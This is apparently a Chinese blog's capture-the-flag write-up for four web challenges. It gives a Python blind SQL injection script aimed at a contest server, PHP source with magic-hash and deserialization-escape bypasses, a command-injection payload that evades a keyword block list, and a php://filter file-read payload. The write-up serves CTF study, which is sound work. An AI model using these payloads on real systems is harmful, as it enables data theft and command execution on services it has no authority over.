Eazy_sqli

双写绕过+布尔盲注,直接上脚本:

import requests

url = 'http://218.197.154.9:10011/login.php'
flag = ''
for i in range(1,300):
    print(i)
    low = 32
    high =128
    mid = (low+high)//2
    while(low<high):
        #payload = "1' oorr ascii(substr((selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()),{},1))>{}#".format(i,mid)
        #payload = "1' oorr ascii(substr((selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='f1ag_y0u_wi1l_n3ver_kn0w'),{},1))>{}#".format(i, mid)
        payload = "1' oorr ascii(substr((seselectlect f111114g frfromom f1ag_y0u_wi1l_n3ver_kn0w),{},1))>{}#".format(i,mid)
        data = {
            "user":payload,
            "pass":"l"
        }
        r = requests.post(url=url,data=data)
        if "Login success!" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    if(mid ==32 or mid ==127):
        break
    flag +=chr(mid)
    print(flag)

ezphp

源码:

<?php
error_reporting(0);
highlight_file(__file__);
$string_1 = $_GET['str1'];
$string_2 = $_GET['str2'];

//1st
if($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])){
    echo '1st ok'."<br>";
}
else{
    die('会代码审计嘛23333');
}


//2nd
if(is_numeric($string_1)){
    $md5_1 = md5($string_1);
    $md5_2 = md5($string_2);

    if($md5_1 != $md5_2){
        $a = strtr($md5_1, 'pggnb', '12345');
        $b = strtr($md5_2, 'pggnb', '12345');
        if($a == $b){
            echo '2nd ok'."<br>";
        }
        else{
            die("can u give me the right str???");
        }
    } 
    else{
        die("no!!!!!!!!");
    }
}
else{
    die('is str1 numeric??????');
}

//3nd
function filter($string){
    return preg_replace('/x/', 'yy', $string);
}

$username = $_POST['username'];

$password = "aaaaa";
$user = array($username, $password);

$r = filter(serialize($user));
if(unserialize($r)[1] == "123456"){
    echo file_get_contents('flag.php');
}

num用%0a绕过,MD5用php循环找一下(我水平低):

<?php
$string_2='240610708';
for($string_1=100000;;$string_1++)
{
    $md5_1 = md5($string_1);
    $md5_2 = md5($string_2);
    if($md5_1 != $md5_2) {
        $a = strtr($md5_1, 'pggnb', '12345');
        $b = strtr($md5_2, 'pggnb', '12345');
        if ($a == $b) {
            echo $string_1 . "<br>";
            break;
        }
    }
}

成功找到之后进行下一步,详解PHP反序列化中的字符逃逸—peri0d

反序列化字符逃逸payload:leukxxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}

ezcmd

源码:

<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("no space!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("no flag");
  } else if(preg_match("/tac|rm|echo|cat|nl|less|more|tail|head/", $ip)){
    die("cat't read flag");
  }
  $a = shell_exec("ping -c 4 ".$ip); 
  echo "<pre>";
  print_r($a);
}
highlight_file(__FILE__);

?>

没啥好说的,就比pingpingping多过滤了cat rm这些,用od -c绕过去(我并不知道预期是啥,但这样能做出来,就是flag出来之后格式要调比较麻烦),直接上payload:?ip=127.0.0.1;b=g;od$IFS$1-c$IFS$1fla$b.php

ezinclude

脑洞题。。。。。。在thankyou.php,直接上payload:?file=php://filter/read=convert.base64-encode/resource=flag.php

 

 

 

Categories:

Tags:

No responses yet

发表评论

电子邮件地址不会被公开。 必填项已用*标注

闽ICP备19027300号